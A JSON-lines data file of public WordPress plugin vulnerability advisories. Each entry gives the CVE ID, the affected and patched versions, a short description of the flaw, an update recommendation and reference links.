{"CVE_ID":"CVE-2023-5822","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.7.3","versionEndExcluding":"1.3.7.4","description":"The Drag and Drop Multiple File Upload - Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads to insufficient file type validation in the 'dnd_upload_cf7_upload' function in versions up to, and including, 1.3.7.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This can be exploited if a user authorized to edit form, which means editor privileges or above, has added a 'multiple file upload' form field with '*' acceptable file types.","recommendation":"Update to version 1.3.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3be300-5b7f-4844-8637-1bb8c939ed4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b3be300-5b7f-4844-8637-1bb8c939ed4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L828\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L855\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L855\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.7.2\\\/inc\\\/dnd-upload-cf7.php#L904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987252%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=2968538%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987252%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=2968538%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24566","slug":"woocommerce-currency-switcher","versionImpact":"1.3.7","versionEndExcluding":"1.3.7.1","description":"The WooCommerce Currency Switcher FOX WordPress plugin before 1.3.7 was vulnerable to LFI attacks via the \"woocs\" shortcode.","recommendation":"Update to version 1.3.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0bc4b13-53fe-462d-8306-8915196d3a5a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0bc4b13-53fe-462d-8306-8915196d3a5a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/07\\\/22\\\/severe-vulnerability-patched-in-woocommerce-currency-switcher\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/07\\\/22\\\/severe-vulnerability-patched-in-woocommerce-currency-switcher\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4000","slug":"pearl-header-builder","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The WordPress Header Builder Plugin \u2013 Pearl plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stm_hb' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23bba83-35d2-4098-8104-8389bb2ff880?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23bba83-35d2-4098-8104-8389bb2ff880?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078437%40pearl-header-builder&new=3078437%40pearl-header-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078437%40pearl-header-builder&new=3078437%40pearl-header-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10794","slug":"boostify-header-footer-builder","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.6 via the 'bhf' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9f6d07-5ba5-48ad-bfcc-084913436b39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9f6d07-5ba5-48ad-bfcc-084913436b39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185478\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/class-boostify-header-footer-builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185478\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/class-boostify-header-footer-builder.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7420","slug":"insert-php-code-snippet","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The Insert PHP Code Snippet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation in the \/admin\/snippets.php file. This makes it possible for unauthenticated attackers to activate\/deactivate and delete code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88001f3c-f5cc-4051-a713-788014e2241a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88001f3c-f5cc-4051-a713-788014e2241a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134787\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134787\\\/insert-php-code-snippet\\\/trunk\\\/admin\\\/snippets.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125103","slug":"twitter-plugin","versionImpact":"1.3.2","versionEndExcluding":"1.3.7","description":"A vulnerability was found in BestWebSoft Twitter Plugin up to 1.3.2 on WordPress. It has been declared as problematic. Affected by this vulnerability is the function twttr_settings_page of the file twitter.php. The manipulation of the argument twttr_url_twitter\/bws_license_key\/bws_license_plugin leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.7 is able to address this issue. The name of the patch is e04d59ab578316ffeb204cf32dc71c0d0e1ff77c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230155.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230155\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230155\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/e04d59ab578316ffeb204cf32dc71c0d0e1ff77c\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/e04d59ab578316ffeb204cf32dc71c0d0e1ff77c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230155\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230155\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6266","slug":"backup-backup","versionImpact":"1.3.6","versionEndExcluding":"1.3.7","description":"The Backup Migration plugin for WordPress is vulnerable to unauthorized access of data due to insufficient path and file validation on the BMI_BACKUP case of the handle_downloading function in all versions up to, and including, 1.3.6. This makes it possible for unauthenticated attackers to download back-up files which can contain sensitive information such as user passwords, PII,  database credentials, and much more.","recommendation":"Update to version 1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08801f53-3c57-41a3-a637-4b52637cc612?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08801f53-3c57-41a3-a637-4b52637cc612?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L972\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L972\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L1048\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.5\\\/includes\\\/initializer.php#L1048\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/initializer.php#L1065\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/initializer.php#L1065\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1661","slug":"woocommerce-products-filter","versionImpact":"1.3.6.5","versionEndExcluding":"1.3.6.6","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.3.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_text\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_text\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249621%40woocommerce-products-filter&new=3249621%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249621%40woocommerce-products-filter&new=3249621%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253169%40woocommerce-products-filter&new=3253169%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253169%40woocommerce-products-filter&new=3253169%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11400","slug":"woocommerce-products-filter","versionImpact":"1.3.6.3","versionEndExcluding":"1.3.6.4","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the really_curr_tax parameter in all versions up to, and including, 1.3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3158e77-39b3-4151-8f10-5824000a585a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3158e77-39b3-4151-8f10-5824000a585a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186438\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186438\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7491","slug":"woocommerce-products-filter","versionImpact":"1.3.6.1","versionEndExcluding":"1.3.6.2","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.3.6.1 via the woof_messenger_remove_subscr AJAX action due to missing validation on the 'key' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to unsubscribe users from a product notification sign-ups, if they can successfully obtain or brute force the key value for users who signed up to receive notifications. This vulnerability requires the plugin's Products Messenger extension to be enabled.","recommendation":"Update to version 1.3.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daf6b0d5-79a6-4b8f-924e-9e78cb2b5742?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daf6b0d5-79a6-4b8f-924e-9e78cb2b5742?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3156511%40woocommerce-products-filter&old=3129454%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3156511%40woocommerce-products-filter&old=3129454%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6457","slug":"woocommerce-products-filter","versionImpact":"1.3.6","versionEndExcluding":"1.3.6.1","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018woof_author\u2019 parameter in all versions up to, and including, 1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecfdf7b1-9bb8-4c1d-a00a-ca1e44440cab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecfdf7b1-9bb8-4c1d-a00a-ca1e44440cab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_author\\\/index.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/ext\\\/by_author\\\/index.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116888\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116888\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9061","slug":"wp-popup-builder","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The The WP Popup Builder \u2013 Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166506\\\/wp-popup-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166506\\\/wp-popup-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12627","slug":"coupon-x-discount-pop-up","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.5 via deserialization of untrusted input from post content passed to the capture_email AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/468be776-8804-4d2f-8eaf-841bbf598ef9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/468be776-8804-4d2f-8eaf-841bbf598ef9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12204","slug":"coupon-x-discount-pop-up","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in the class-cx-rest.php file in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create 100% off coupons, delete posts, delete leads, and update coupon statuses.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219466\\\/coupon-x-discount-pop-up\\\/trunk\\\/inc\\\/class-cx-rest.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52d8b5e-727f-474a-a255-c24033db17d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52d8b5e-727f-474a-a255-c24033db17d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6271","slug":"backup-backup","versionEndExcluding":"1.3.6","description":"The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ac217db-f332-404b-a265-6dc86fe747b9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ac217db-f332-404b-a265-6dc86fe747b9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6271-backup-migration-unauth-sensitive-data-exposure-to-full-control-of-the-site-poc-exploit\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6271-backup-migration-unauth-sensitive-data-exposure-to-full-control-of-the-site-poc-exploit\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13533","slug":"small-package-quotes-usps-edition","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Small Package Quotes \u2013 USPS Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 1.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-usps-edition\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-usps-edition\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242060%40small-package-quotes-usps-edition&new=3242060%40small-package-quotes-usps-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242060%40small-package-quotes-usps-edition&new=3242060%40small-package-quotes-usps-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0e67883-1f6c-4454-8d51-96fa2d1366d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0e67883-1f6c-4454-8d51-96fa2d1366d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1663","slug":"ultimate-noindex-nofollow-tool-ii","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Ultimate Noindex Nofollow Tool II WordPress plugin before 1.3.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d101f2b-e903-4e64-92cc-e550abb52d6f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d101f2b-e903-4e64-92cc-e550abb52d6f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10360","slug":"move-addons","versionImpact":"1.3.5","versionEndExcluding":"1.3.6","description":"The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes\/widgets\/accordion\/widget.php, includes\/widgets\/remote-template\/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eafe73b4-b492-45c7-adca-d9a3042144b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eafe73b4-b492-45c7-adca-d9a3042144b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176341\\\/move-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176341\\\/move-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5039","slug":"woocommerce-products-filter","versionImpact":"1.3.5.3","versionEndExcluding":"1.3.6","description":"The HUSKY \u2013 Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6e7fcd-f5f5-47a0-9d8a-74e2f67d10b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6e7fcd-f5f5-47a0-9d8a-74e2f67d10b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/views\\\/woof.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-products-filter\\\/trunk\\\/views\\\/woof.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093324\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093324\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4650","slug":"hashbar-wp-notification-bar","versionEndExcluding":"1.3.6","description":"The HashBar WordPress plugin before 1.3.6 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b430fdaa-191a-429e-b6d2-479b32bb1075\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b430fdaa-191a-429e-b6d2-479b32bb1075\",\"refsource\":\"MISC\",\"tags\":[]}]"}
